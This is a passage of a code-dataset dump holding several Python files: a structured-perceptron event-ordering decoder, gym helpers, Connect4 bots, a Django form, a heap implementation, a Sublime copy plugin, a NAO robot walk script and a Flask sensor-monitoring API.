zip(vector_graphs,perms):\n correct_rows.append([index for index,e in enumerate(G.edges()) if e in perm])\n \n x0 = self._weights\n w = scipy.optimize.fmin_l_bfgs_b(scipy_minus_objective, x0, fprime=scipy_minus_gradient, \n args=(feature_vectors,correct_rows,batches,self._sigma,self),pgtol=0.01)\n print('LBFGS Converged.')\n sys.stdout.flush()\n self._weights = numpy.reshape(w[0],(1,self._num_features))\n\n if self._model_pickle:\n self._interm_averaged_model = self._weights\n f_pickle = open(self._model_pickle+'_bfgs','w')\n pickle.dump(self,f_pickle,pickle.HIGHEST_PROTOCOL)\n f_pickle.close()\n \n def print_vec(self,v,prefix):\n sys.stdout.write(prefix+'\\n')\n for ind in range(v.shape[1]):\n if v[0,ind] != 0:\n sys.stdout.write(str(self._vec_feature_names[ind])+':'+str(v[0,ind])+' ')\n sys.stdout.write('\\n')\n \n def print_learning_curve(self,iter_ind,instance_ind,all_pair_swaps,all_triple_swaps,all_quad_swaps,exact_match):\n macro_avg_pair_swaps = 1.0 * sum([p[0] for p in all_pair_swaps]) / sum([p[1] for p in all_pair_swaps])\n macro_avg_triple_swaps = 1.0 * sum([p[0] for p in all_triple_swaps]) / sum([p[1] for p in all_triple_swaps])\n macro_avg_quad_swaps = 1.0 * sum([p[0] for p in all_quad_swaps]) / sum([p[1] for p in all_quad_swaps])\n print(' '.join(['Learning curve:',str(iter_ind),str(instance_ind),str(macro_avg_pair_swaps),\\\n str(macro_avg_triple_swaps),str(macro_avg_quad_swaps),str(exact_match)]))\n\n \"\"\"\n def old_local_fit(self,vector_graphs,perms):\n\n same as fit, but does the fitting not using a structured perceptron, but \n using a regular perceptron.\n vector_graphs, perms = shuffle(vector_graphs,perms)\n sum_weight_vectors = np.zeros(shape=self._weights.shape)\n for ind in range(self._num_iters):\n instance_index = 0\n for G,correct_perm in zip(vector_graphs,perms):\n edge_weights = dict([(e,-w) for e,w in G.get_edge_weights(self._weights)])\n #labeled_edges = [((e[1],e[0]),-1) for e in G.edges()] + \\\n # [(e,1) for e in predicted_perm]\n for e in correct_perm:\n if edge_weights[e] <= 0: # if incorrectly negative\n self._weights = self._weights + self._eta * G.get_vec(e)\n inv_e = (e[1],e[0])\n if inv_e in edge_weights and edge_weights[inv_e] >= 0: # if incorrectly negative\n self._weights = self._weights - self._eta * G.get_vec(inv_e)\n print(instance_index,len(self._vec_feature_names),self._weights.size,np.linalg.norm(self._weights))\n sum_weight_vectors = sum_weight_vectors + self._weights\n instance_index += 1\n if self._averaged:\n self._weights = sum_weight_vectors / (self._num_iters * len(perms))\n if self._calc_train_acc:\n print('Training accuracy (after averaging):'+ str(self.test_on_data(vector_graphs,perms)) )\n \"\"\"\n \n def local_fit(self,vector_graphs,perms):\n \"\"\"\n same as fit, but treats the problem as a binary problem of distinguishing between\n correct and incorrect edges. \n \"\"\"\n vector_graphs, perms = shuffle(vector_graphs,perms)\n sum_weight_vectors = np.zeros(shape=self._weights.shape)\n for ind in range(self._num_iters):\n instance_index = 0\n for G,correct_perm in zip(vector_graphs,perms):\n predicted_perm = self.predict(G)\n if predicted_perm == None:\n continue\n for e in G.edges():\n if e in correct_perm and e not in predicted_perm:\n self._weights = self._weights + self._eta * G.get_vec(e).transpose()\n if e not in correct_perm and e in predicted_perm:\n self._weights = self._weights - self._eta * G.get_vec(e).transpose()\n print('Instance #'+str(instance_index)+' '+str(self._weights.size,np.linalg.norm(self._weights)))\n sum_weight_vectors = sum_weight_vectors + self._weights\n instance_index += 1\n if self._averaged:\n self._weights = sum_weight_vectors / (self._num_iters * len(perms))\n if self._calc_train_acc:\n print('Training accuracy (after averaging):'+ str(self.test_on_data(vector_graphs,perms)) )\n \n def predict(self,event_graph):\n \"\"\"\n Returns the predicted permutation for the event graph.\n \"\"\"\n if self._greedy_inference:\n return self.greedy_inference(event_graph)\n elif self._probs_insteadOf_weights:\n return find_min_hamiltonian_path(event_graph,self._weights,True)\n else:\n return find_min_hamiltonian_path(event_graph,self._weights)\n \n def greedy_inference(self,event_graph):\n edge_weights = event_graph.get_edge_weights(self._weights)\n if self._probs_insteadOf_weights:\n edge_weights = weights_to_probs(event_graph,edge_weights)\n predicted_perm = []\n non_visited_nodes = set([v for v in event_graph.vertices() if v not in [START_NODE,END_NODE]])\n cur_node = START_NODE\n while len(non_visited_nodes) > 0:\n possible_edges = [(cur_node,v) for v in non_visited_nodes]\n L = [(e,w) for e,w in edge_weights if e in possible_edges]\n np.random.shuffle(L)\n e_max = min(L,key=lambda x:x[1])[0]\n predicted_perm.append(e_max)\n non_visited_nodes.remove(e_max[1])\n cur_node = e_max[1]\n predicted_perm.append((cur_node,END_NODE))\n return predicted_perm\n\n def binary_classification(self,test_samples,test_labels):\n \"\"\"\n Computes how often is the correct path more highly ranked than a random one.\n \"\"\"\n num_correct = 0\n num_samples = 0\n for sample,perm in zip(test_samples,test_labels):\n if len(sample.vertices()) == 3:\n continue\n minus_edge_weights = sample.get_edge_weights(self._weights)\n S_correct = 0.0\n S_all = 0.0\n for e,w in minus_edge_weights:\n if e == (START_NODE,END_NODE):\n continue\n if e in perm:\n S_correct += -1 * w\n S_all += -1 * w\n S_avg = S_all / (len(sample.vertices()) - 2)\n if S_correct > S_avg:\n num_correct += 1\n elif S_correct == S_avg:\n num_correct += 0.5\n num_samples += 1\n if num_samples % 50 == 0:\n print(num_samples)\n return 1.0 * num_correct / num_samples\n \n def greedy_inference2(self,event_graph):\n \"\"\"\n Greedy inference, but a different heuristic. It first selects the heaviest edge in the graph,\n then the second etc.\n \"\"\"\n edge_weights = event_graph.get_edge_weights(self._weights)\n if self._probs_insteadOf_weights:\n edge_weights = weights_to_probs(event_graph,edge_weights)\n predicted_perm = []\n vertex_out = set(event_graph.vertices())\n vertex_in = set(event_graph.vertices())\n while len(vertex_out) > 1 and len(vertex_in) > 1:\n possible_edges_weights = [(e,w) for e,w in edge_weights \\\n if e[0] in vertex_out and e[1] in vertex_in]\n np.random.shuffle(possible_edges_weights)\n e_max = max(possible_edges_weights,key=lambda x:x[1])[0]\n vertex_out.remove(e_max[0])\n vertex_in.remove(e_max[1])\n predicted_perm.append(e_max)\n predicted_perm.extend([(START_NODE,v) for v in vertex_in])\n predicted_perm.extend([(END_NODE,v) for v in vertex_in])\n return predicted_perm\n \n def objective(self,vector_graphs,perms):\n pass\n \n def test_on_data(self,vector_graphs,correct_perms,output_file=None):\n total_instances = 0\n exact_match = 0\n all_pair_swaps = []\n all_triple_swaps = []\n all_quad_swaps = []\n errs = []\n for G,correct_perm in zip(vector_graphs,correct_perms):\n predicted_perm = self.predict(G)\n if predicted_perm is None:\n predicted_perm = self.greedy_inference(G)\n print('Test instance '+str(total_instances)+': ILP failed. Reverting to greedy method.')\n print('Test instance '+str(total_instances)+' processed')\n if output_file:\n output_file.write('Instance #'+str(total_instances)+'\\n'+ \\\n str(predicted_perm)+'\\n'+str(correct_perm)+'\\n========\\n')\n total_instances += 1\n if total_instances % 100 == 0 and output_file:\n output_file.flush()\n try:\n if set(predicted_perm) == set(correct_perm):\n exact_match += 1\n predicted_perm_c = convert_edges_perm(predicted_perm)\n correct_perm_c = convert_edges_perm(correct_perm)\n pair_swaps = num_agreeing_tuples(predicted_perm_c,correct_perm_c,2)\n triple_swaps = num_agreeing_tuples(predicted_perm_c,correct_perm_c,3)\n quad_swaps = num_agreeing_tuples(predicted_perm_c,correct_perm_c,4)\n all_pair_swaps.append(pair_swaps)\n all_triple_swaps.append(triple_swaps)\n all_quad_swaps.append(quad_swaps)\n self.print_learning_curve('Test',total_instances,all_pair_swaps,all_triple_swaps,\\\n all_quad_swaps,1.0*exact_match/total_instances)\n except Exception as e:\n errs.append(total_instances)\n\n macro_avg_pair_swaps = 1.0 * sum([p[0] for p in all_pair_swaps]) / sum([p[1] for p in all_pair_swaps])\n macro_avg_triple_swaps = 1.0 * sum([p[0] for p in all_triple_swaps]) / sum([p[1] for p in all_triple_swaps])\n macro_avg_quad_swaps = 1.0 * sum([p[0] for p in all_quad_swaps]) / sum([p[1] for p in all_quad_swaps])\n #micro_avg_pair_swaps = 1.0 * sum(kandall_tau) / len(kandall_tau)\n \n return 1.0 * exact_match / total_instances, macro_avg_pair_swaps, macro_avg_triple_swaps, macro_avg_quad_swaps, errs\n\n\n \n \"\"\"\n def test_on_data_from_file(self,feat_extractor,test_file):\n total_instances = 0\n exact_match = 0\n kandall_tau = []\n swap_pairs = []\n for recipe,correct_perm in driver.read_recipe(test_file):\n G = feat_extractor.extract_features(recipe)\n predicted_perm = self.predict(G)\n total_instances += 1\n if predicted_perm == correct_perm:\n exact_match += 1\n tau, pair_swaps = get_permutation_scores(predicted_perm,correct_perm)\n kandall_tau.append(tau)\n swap_pairs.append(pair_swaps)\n\n macro_avg_pair_swaps = 1.0 * sum([p[0] for p in swap_pairs]) / sum([p[1] for p in swap_pairs])\n micro_avg_pair_swaps = 1.0 * sum(kandall_tau) / len(kandall_tau)\n\n return 1.0 * exact_match / total_instances, macro_avg_pair_swaps, micro_avg_pair_swaps\n \"\"\"\n\ndef weights_to_probs(G,edge_weights):\n \"\"\"\n Receives a graph and a list of pairs of edges and weights. Normalizes the score of each node to 1.\n \"\"\"\n new_edge_weights = []\n for v in G.vertices():\n outgoing_edges = [e for e in G.edges() if e[0] == v]\n outgoing_edge_weights = [(e,math.exp(w)) for e,w in edge_weights if e in outgoing_edges]\n S = sum([x[1] for x in outgoing_edge_weights])\n new_edge_weights.extend([(e,w/S) for e,w in outgoing_edge_weights])\n return new_edge_weights\n\ndef get_permutation_scores(predicted_perm,correct_perm):\n #micro = []\n macro = []\n for k in [2,3,4]:\n tuple_swaps = num_agreeing_tuples(convert_edges_perm(predicted_perm),convert_edges_perm(correct_perm),k)\n macro.append(tuple_swaps)\n #num_swaps(convert_edges_perm(predicted_perm),convert_edges_perm(correct_perm))\n #if tuple_swaps[1] > 0:\n # micro.append(1.0 * pair_swaps[0] / pair_swaps[1])\n #else:\n # micro.append(None)\n return macro\n\n\ndef convert_edges_perm(edges):\n \"\"\"\n receives a list of pairs (edges) that form a permutation. \n returns a list of the nodes according to the permutation (starting with START_NODE).\n \"\"\"\n L = dict(edges)\n output = [START_NODE]\n while output[-1] != END_NODE:\n output.append(L[output[-1]])\n if len(edges) + 1 != len(output):\n raise Exception()\n return output\n\n\ndef num_swaps(perm1,perm2):\n \"\"\"\n Determines the number of swaps between perm1 and perm2.\n Each of the lists is a list of unique numbers.\n The first and the last element are assumed to be fixed and are excluded.\n \"\"\"\n if len(perm1) != len(perm2) or len(set(perm1)) != len(perm1) or len(set(perm2)) != len(perm2):\n raise Exception(\"Incompatible lists\")\n perm1 = perm1[1:-1]\n perm2 = perm2[1:-1]\n agree = 0\n disagree = 0\n for pair1,pair2 in itertools.combinations(zip(perm1,perm2),2):\n if (pair1[0] > pair2[0] and pair1[1] > pair2[1]) or (pair1[0] < pair2[0] and pair1[1] < pair2[1]):\n agree += 1\n else:\n disagree += 1\n return agree, agree+disagree\n\ndef num_agreeing_tuples(perm1,perm2,k):\n \"\"\"\n same as num_swaps, but for k-tuples.\n \"\"\"\n if len(perm1) != len(perm2) or len(set(perm1)) != len(perm1) or len(set(perm2)) != len(perm2):\n raise Exception(\"Incompatible lists\")\n perm1 = perm1[1:-1]\n perm2 = perm2[1:-1]\n agree = 0\n disagree = 0\n for index_tuple in itertools.combinations(range(len(perm1)),k):\n tuple1 = [perm1[ind] for ind in index_tuple]\n tuple2 = [perm2[ind] for ind in index_tuple]\n ordered_tuple1 = sorted(tuple1)\n ordered_tuple2 = sorted(tuple2)\n ordinals1 = [bisect.bisect_left(ordered_tuple1,x) for x in tuple1]\n ordinals2 = [bisect.bisect_left(ordered_tuple2,x) for x in tuple2]\n if ordinals1 == ordinals2:\n agree += 1\n else:\n disagree += 1\n return agree,agree+disagree\n\n\n#####################################################\n# SCIPY METHODS\n#####################################################\n\ndef scipy_minus_gradient(w,all_vector_graphs,all_correct_rows,\\\n all_batches,sigma=None,perceptron=None):\n \"\"\"\n Returns the minus gradient of the log likelihood.\n vector_graphs is a list of all the vectors in the training data.\n correct_rows are the row indices of the correct edges.\n batches is the list of indices corresponding to each vertex.\n \"\"\"\n if perceptron:\n perceptron._gradient_iter += 1\n g = None\n index = 0\n for vector_graphs,correct_rows,batches in zip(all_vector_graphs,all_correct_rows,all_batches):\n first_term = vector_graphs[correct_rows,:].sum(axis=0)\n all_scores = vector_graphs * w\n all_probs = []\n for batch in batches:\n batch_scores = all_scores[batch]\n S = logsumexp(batch_scores)\n all_probs.append(np.exp(batch_scores - S))\n all_probs = numpy.hstack(all_probs)\n second_term = all_probs * vector_graphs\n if g is None:\n g = second_term - first_term\n else:\n g = g + second_term - first_term\n index += 1\n if index % 100 == 0:\n print('Gradient '+str(index)+' processed')\n g = numpy.ndarray.flatten(numpy.asarray(g)) / len(all_vector_graphs)\n if sigma != None:\n g = g + sigma * w\n print('Gradient norm:'+str(scipy.linalg.norm(g)))\n sys.stdout.flush()\n if perceptron and perceptron._model_pickle:\n if perceptron._gradient_iter % 5 == 0:\n perceptron._weights = numpy.reshape(w,(1,perceptron._num_features))\n perceptron.save(perceptron._model_pickle+'_'+str(perceptron._gradient_iter))\n return g\n\ndef scipy_minus_objective(w,all_vector_graphs,all_correct_rows,\\\n all_batches,sigma=None,perceptron=None):\n \"\"\"\n Returns the minus log-likelihood of the data.\n vector_graphs is a matrix of all the vectors in the training data.\n correct_rows are the row indices of the correct edges.\n batches is the list of indices corresponding to each vertex.\n \"\"\"\n if perceptron:\n perceptron._obj_iter += 1\n obj = 0.0\n index = 0\n for vector_graphs,correct_rows,batches in zip(all_vector_graphs,all_correct_rows,all_batches):\n all_scores = vector_graphs * w\n sum_log_Z = 0.0\n for batch in batches:\n batch_scores = all_scores[batch]\n sum_log_Z += logsumexp(batch_scores) #np.log(np.exp(batch_scores).sum())\n obj += all_scores[correct_rows].sum() - sum_log_Z\n index += 1\n if index % 100 == 0:\n print('Objective '+str(index)+' processed')\n obj = obj / len(all_vector_graphs)\n if sigma != None:\n obj += - 0.5 * sigma * (w * w).sum()\n print('Objective:'+str(obj))\n return -1.0 * obj\n\ndef exp_and_normalize_vec(v):\n S = logsumexp(v)\n return np.exp(v - S), S\n\n\n\nif __name__ == '__main__':\n print(num_agreeing_tuples([],[],4))\n S = 0\n S2 = 0 \n for s in range(200):\n random.seed(s)\n L1 = random.sample(range(20),20)\n L2 = random.sample(range(20),20)\n S += num_agreeing_tuples(L1,L2,4)[0]\n S2 += num_agreeing_tuples(L1,L2,4)[1]\n print(S, S2)\n \n","sub_path":"decoder.py","file_name":"decoder.py","file_ext":"py","file_size_in_byte":30983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"618581245","text":"\"\"\"\nHelpers for dealing with vectorized environments.\n\"\"\"\n\nfrom collections import OrderedDict\nfrom contextlib import contextmanager\nimport sys\n\nimport gym\nimport numpy as np\n\n\n@contextmanager\ndef stdout_redirected(new_stdout):\n saved_stdout = sys.stdout\n sys.stdout = new_stdout\n try:\n yield None\n finally:\n sys.stdout.close()\n sys.stdout = saved_stdout\n\ndef copy_obs_dict(obs):\n \"\"\"\n Deep-copy an observation dict.\n \"\"\"\n return {k: np.copy(v) for k, v in obs.items()}\n\n\ndef dict_to_obs(obs_dict):\n \"\"\"\n Convert an observation dict into a raw array if the\n original observation space was not a Dict space.\n \"\"\"\n if set(obs_dict.keys()) == {None}:\n return obs_dict[None]\n return obs_dict\n\n\ndef obs_space_info(obs_space):\n \"\"\"\n Get dict-structured information about a gym.Space.\n Returns:\n A tuple (keys, shapes, dtypes):\n keys: a list of dict keys.\n shapes: a dict mapping keys to shapes.\n dtypes: a dict mapping keys to dtypes.\n \"\"\"\n if isinstance(obs_space, gym.spaces.Dict):\n assert isinstance(obs_space.spaces, OrderedDict)\n subspaces = obs_space.spaces\n else:\n subspaces = {None: obs_space}\n keys = []\n shapes = {}\n dtypes = {}\n for key, box in subspaces.items():\n keys.append(key)\n shapes[key] = box.shape\n dtypes[key] = box.dtype\n return keys, shapes, dtypes\n\n\ndef obs_to_dict(obs):\n \"\"\"\n Convert an observation into a dict.\n \"\"\"\n if isinstance(obs, dict):\n return obs\n return {None: obs}\n\n\ndef print_dic(dic):\n for key in dic.keys():\n if isinstance(dic[key], dict):\n print(key, \":\")\n for items in dic[key]:\n print(\" %s : %s\" % (items, dic[key][items]))\n else:\n print(key, ':', dic[key])\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"505942187","text":"# Name: Grant Messner\n# CMS cluster login name: gmessner\n\n'''\nfinal_players.py\n\nThis module contains code for various bots that play Connect4 at varying \ndegrees of sophistication.\n'''\n\nimport random\nfrom Connect4Simulator import *\nimport copy\n\n\nclass RandomPlayer:\n '''\n This player makes one of the possible moves on the game board,\n chosen at random.\n '''\n def chooseMove(self, board, player):\n '''\n Given the current board and player number, choose and return a move.\n\n Arguments:\n board -- a Connect4Board instance\n player -- either 1 or 2\n\n Precondition: There must be at least one legal move.\n Invariant: The board state does not change.\n '''\n\n assert player in [1, 2]\n possibles = board.possibleMoves()\n assert possibles != []\n return random.choice(possibles)\n\n\nclass SimplePlayer:\n '''\n This player will always play a move that gives it a win if there is one.\n Otherwise, it picks a random legal move.\n '''\n\n def chooseMove(self, board, player):\n '''\n Given the current board and player number, choose and return a move.\n\n Arguments:\n board -- a Connect4Board instance\n player -- either 1 or 2\n\n Precondition: There must be at least one legal move.\n Invariant: The board state does not change.\n '''\n assert player in [1, 2]\n moves = board.possibleMoves()\n assert player != [] \n for i in moves:\n if board.isWinningMove(i, player):\n return i\n return random.choice(moves)\n\n\nclass BetterPlayer:\n '''\n This player will always play a move that gives it a win if there is one.\n Otherwise, it tries all moves, collects all the moves which don't allow\n the other player to win immediately, and picks one of those at random.\n If there is no such move, it picks a random move.\n '''\n\n def chooseMove(self, board, player):\n '''\n Given the current board and player number, choose and return a move.\n\n Arguments:\n board -- a Connect4Board instance\n player -- either 1 or 2\n\n Precondition: There must be at least one legal move.\n Invariant: The board state does not change.\n '''\n assert player in [1, 2]\n moves = board.possibleMoves()\n assert player != [] \n for i in moves:\n if board.isWinningMove(i, player):\n return i\n oppWinningMoves = []\n for j in moves:\n board.makeMove(j, player)\n newMoves = board.possibleMoves()\n for k in newMoves: \n if board.isWinningMove(k, 3 - player):\n oppWinningMoves.append(j)\n board.unmakeMove(j)\n goodMoves = copy.deepcopy(moves)\n for o in oppWinningMoves:\n if o in goodMoves:\n goodMoves.remove(o)\n if goodMoves != []:\n return random.choice(goodMoves)\n else:\n return random.choice(moves)\n\nclass Monty:\n '''\n This player will randomly simulate games for each possible move,\n picking the one that has the highest probability of success.\n '''\n\n def __init__(self, n, player):\n '''\n Initialize the player using a simpler computer player.\n\n Arguments: \n n -- number of games to simulate.\n player -- the computer player\n '''\n assert n > 0\n self.player = player\n self.n = n\n\n def chooseMove(self, board, player):\n '''\n Given the current board and player number, choose and return a move.\n\n Arguments:\n board -- a Connect4Board instance\n player -- either 1 or 2\n\n Precondition: There must be at least one legal move.\n Invariant: The board state does not change.\n '''\n assert player in [1, 2]\n moves = board.possibleMoves()\n assert player != [] \n for i in moves:\n if board.isWinningMove(i, player):\n return i \n winCounts = {}\n for j in moves:\n cloneBoard = board.clone()\n cloneBoard.makeMove(j, player)\n numWins = 0\n for k in range(0, self.n):\n sim = Connect4Simulator(cloneBoard, self.player, self.player, \\\n 3 - player)\n result = sim.simulate()\n if result == player:\n numWins += 1\n cloneBoard = board.clone()\n cloneBoard.makeMove(j, player)\n winCounts[j] = numWins\n maxWins = 0\n for val in winCounts.values():\n if val > maxWins:\n maxWins = val\n for key in winCounts.keys():\n if winCounts[key] == maxWins:\n return key\n","sub_path":"Desktop/CS1/Final/final_players.py","file_name":"final_players.py","file_ext":"py","file_size_in_byte":4885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"102267346","text":"from django import forms\nfrom .models import *\nfrom django.core.exceptions import ValidationError\n\n\ndef weight_validate(value):\n if not str(value).isdigit():\n raise ValidationError('请输入正确的数量')\n\n\nclass ProductForm(forms.ModelForm):\n # 添加模型外字段\n productID = forms.CharField(max_length=20, label='产品序号')\n\n # 模型与表单设置\n class Meta:\n # 绑定模型\n model = Product\n fields = '__all__'\n exclude = []\n # 设置label标签\n labels = {\n 'name': '产品名称',\n 'weight': '重量',\n 'size': '尺寸',\n 'type': '产品类型',\n }\n widgets = {'name': forms.widgets.TextInput(attrs={'class': 'c1'})}\n # 定义字段类型\n field_classes = {'name': forms.CharField}\n help_texts = {'name': ''}\n error_messages = {\n '__all__': {'required': '请输入内容',\n 'invalid': '请检查输入内容'},\n 'weight': {'required': '请输入重量数值',\n 'invalid': '请检查数值是否正确'}\n }\n\n def clean_weight(self):\n data = self.cleaned_data['weight']\n return data+'g'\n","sub_path":"index/form.py","file_name":"form.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"174150137","text":"import math\n\ndef height(n, root=0):\n return math.floor(math.log(n, 2)) - math.floor(math.log(root + 1, 2))\n\n\ndef parent(i):\n return math.ceil(i/2)-1\n\n\ndef right(heap, root=0):\n i = (root+1)*2\n if i >= len(heap):\n return None\n return i\n\n\ndef left(heap, root=0):\n i = (root+1)*2-1\n if i >= len(heap):\n return None\n return i\n\n\ndef heapify(heap, root=0):\n left_i = left(heap, root)\n right_i = right(heap, root)\n\n if left_i is not None and heap[left_i] > heap[root] and (right_i is None or heap[right_i] <= heap[left_i]):\n heap[root], heap[left_i] = heap[left_i], heap[root]\n heapify(heap, left_i)\n elif right_i is not None and heap[right_i] > heap[root]:\n heap[root], heap[right_i] = heap[right_i], heap[root]\n heapify(heap, right_i)\n\n\ndef build(array):\n for i in range(math.floor(len(array)/2),-1,-1):\n heapify(array, i)\n\n\ndef sort(array):\n build(array)\n size = len(array)\n\n for i in range(size-1,0,-1):\n array[0], array[size-1] = array[size-1], array[0]\n size -= 1\n heapify(array)\n\n return array\n\n\nclass Heap:\n def __init__(self, array):\n super()\n build(array)\n self._array = array\n\n def __getitem__(self, item):\n return self._array[item]\n\n def __setitem__(self, key, value):\n self._array[key] = value\n\n def __len__(self):\n return len(self._array)\n\n def __delitem__(self, key):\n del self._array[key]\n\n def add(self, item):\n self._array.append(item)\n where = len(self._array)-1\n while where != 0 and self[parent(where)] < item:\n new_where = parent(where)\n self[where], self[new_where] = self[new_where], self[where]\n where = new_where\n\n def extract(self, node=0):\n item = self[node]\n left_i = left(self, node)\n right_i = right(self, node)\n\n while left_i is not None or right_i is not None:\n if left_i is not None and (right_i is None or self[left_i] > self[right_i]):\n self[node] = self[left_i]\n node = left_i\n else:\n self[node] = self[right_i]\n node = right_i\n\n left_i = left(self, node)\n right_i = right(self, node)\n\n # Removing the hole\n del self[node]\n\n return item\n\n def print(self, level=0):\n if level > height(len(self)):\n return\n\n nodes = self[2**level-1:2**(level+1)-1]\n nodes.extend(['X']*(2**level - len(nodes)))\n below = max(1,2**(height(len(self))-level+1)-1)\n print(''.join([str(node)+'-'*(below) for node in nodes]))\n self.print(level+1)","sub_path":"heap.py","file_name":"heap.py","file_ext":"py","file_size_in_byte":2703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"613482821","text":"import sublime, sublime_plugin, os, shutil\n# copy \nclass CopyToLampp(sublime_plugin.EventListener):\n\tdef on_post_save(self, view):\n\t\tdirectory = \"/opt/lampp/htdocs/jsoftsite\";\n\t\tif not os.path.exists(directory):\n\t\t\tos.makedirs(directory)\n\t\tfileName = view.file_name()\n\t\tindex = fileName.index(\".io/\")+3\n\t\trelativePath = fileName[index:]\n\t\tfullPath = directory+relativePath\n\t\tif not os.path.exists(os.path.dirname(fullPath)):\n\t\t\tos.makedirs(os.path.dirname(fullPath))\n\t\tshutil.copy(fileName, directory+relativePath)\n\t\tprint(\"Copied\")","sub_path":"debug/autoDebugSaveToLampp.py","file_name":"autoDebugSaveToLampp.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"284850460","text":"import time\nimport naoqi\nip = \"192.168.1.143\"\nport = 9559\n\npostureProxy = naoqi.ALProxy(\"ALRobotPosture\", ip ,port )\nmotionProxy = naoqi.ALProxy(\"ALMotion\", ip ,port )\n\n\n# First make the Nao stand still before it can walk\npostureProxy.goToPosture(\"Stand\", 0.8)\n# StandInit?\n\n\n# X = forward speed\n# forward = 1.0, backward = -1.0\nX = 0.5\n\n# Y = Sidewards speed\n# 1.0 = counter-clockwise, -1.0 = clockwise\nY = 0\n\n# Theta = Rotation speed = # 1.0 = counter-clockwise, -1.0 clockwise\nTheta = 0.0\n\nMotionProxy.moveToward(X, Y, Theta)\ntime.sleep(10.0)\n\n# stop walking\nmotionProxy.stopMove()\n\n# sit and relax joints\npostureProxy.goToPosture(\"Sit\", 0.5)\nmotionProxy.rest()\n","sub_path":"Nao tests/tests/walktest.py","file_name":"walktest.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"338221701","text":"from flask import Flask, render_template, jsonify\nfrom db import CPU, Storage, Base, EnvironmentTPH\nfrom flask_cors import CORS\n\nfrom sqlalchemy import create_engine, select\nfrom sqlalchemy.orm import sessionmaker\n\ndb_filename = './data/monitor_data.db'\n\napp = Flask(__name__)\ncors = CORS(app, resources={r\"/api/*\": {\"origins\": \"*\"}})\n\nengine = create_engine(f'sqlite:///{db_filename}')\nsession = sessionmaker()\nsession.configure(bind=engine)\nBase.metadata.create_all(engine)\n\n\ndef set_status(status):\n if status is True:\n return 'Running', 'fa fa-smile', 'bg-success'\n elif status is False:\n return 'Stopped', 'fas fa-angry', 'bg-danger'\n else:\n return 'Unknown', 'fas fa-sad-tear', 'bg-dark'\n\n\n@app.route('/')\ndef index():\n # check to see if cpu-monitor is running\n monitor_cpu = True\n # check to see if storage monitor is running\n monitor_storage = False\n # check to see if environmental monitor is running\n monitor_enviro = None\n\n # set up component dictionaries and set values\n cpu = {}\n cpu['name'], cpu['icon'] = 'CPU', 'fa-microchip',\n cpu['message'], cpu['emoticon'], cpu['class'] = set_status(monitor_cpu)\n\n storage = {}\n storage['name'], storage['icon'] = 'Storage', 'fa-hdd'\n storage['message'], storage['emoticon'], storage['class'] = set_status(\n monitor_storage)\n\n enviro = {}\n enviro['name'], enviro['icon'] = 'Enviro', 'fa-leaf'\n enviro['message'], enviro['emoticon'], enviro['class'] = set_status(\n monitor_enviro)\n\n statuses = [cpu, storage, enviro]\n return render_template('index.html', statuses=statuses)\n\n\n@app.route('/about')\ndef demo_template():\n return render_template('about.html')\n\n\n@app.route('/api/cpu-load/')\ndef cpu_load(qty=1):\n try:\n qty = abs(int(qty))\n except:\n qty = 1\n active_session = session()\n cpu = active_session.query(CPU).order_by(CPU.created_at.desc()).first()\n data = {cpu.id:{\n 'created_at':cpu.created_at,\n 'host_mac':cpu.host_mac,\n 'cpu_temp':cpu.cpu_temp,\n 'gpu_temp':cpu.gpu_temp,\n 'host_name':cpu.host_name,\n 'id':cpu.id,\n 'load':cpu.load,\n 'serial':cpu.serial,\n }}\n return jsonify(data)\n\n\n@app.route('/api/cpu-load')\ndef cpu_load_latest():\n return cpu_load(1)\n\n\n@app.route(\"/api/device-load\")\ndef device_load():\n return {\"error\": None,}\n\n\n@app.route(\"/api/environment/\")\ndef environment(qty=1):\n try:\n qty = abs(int(qty))\n except:\n qty = 1\n active_session = session()\n enviro = active_session.query(EnvironmentTPH).order_by(EnvironmentTPH.created_at.desc()).limit(qty).all()\n enviro_dict = {}\n for row in enviro:\n enviro_dict[row.id]= {\n 'created_at': row.created_at,\n 'host_mac': row.device_mac,\n 'temperature': row.temperature,\n 'pressure': row.pressure,\n 'humidity': row.humidity,\n 'host_name': row.device_name,\n 'id': row.id,\n 'serial': row.device_serial,\n }\n return jsonify(enviro_dict)\n\n\n@app.route(\"/api/environment\")\ndef environment_latest():\n return environment(1)\n\n\n@app.route(\"/api/temperature/\")\ndef temperature(qty=1):\n try:\n qty = abs(int(qty))\n except:\n qty = 1\n active_session = session()\n enviro = active_session.query(EnvironmentTPH).order_by(EnvironmentTPH.created_at.desc()).limit(qty).all()\n enviro_dict = {}\n for row in enviro:\n enviro_dict[row.id] = {\n 'created_at': row.created_at,\n 'host_mac': row.device_mac,\n 'temperature': row.temperature,\n 'host_name': row.device_name,\n 'id': row.id,\n 'serial': row.device_serial,\n }\n return jsonify(enviro_dict)\n\n\n@app.route(\"/api/temperature\")\ndef temperature_latest():\n return temperature(1)\n\n\n@app.route(\"/api/pressure/\")\ndef pressure(qty=1):\n try:\n qty = abs(int(qty))\n except:\n qty = 1\n active_session = session()\n enviro = active_session.query(EnvironmentTPH).order_by(EnvironmentTPH.created_at.desc()).limit(qty).all()\n enviro_dict = {}\n for row in enviro:\n enviro_dict[row.id] = {\n 'created_at': row.created_at,\n 'host_mac': row.device_mac,\n 'pressure': row.pressure,\n 'host_name': row.device_name,\n 'id': row.id,\n 'serial': row.device_serial,\n\n }\n return jsonify(enviro_dict)\n\n\n@app.route(\"/api/pressure\")\ndef pressure_latest():\n return pressure(1)\n\n\n@app.route(\"/api/humidity/\")\ndef humidity(qty=1):\n try:\n qty = abs(int(qty))\n except:\n qty = 1\n active_session = session()\n enviro = 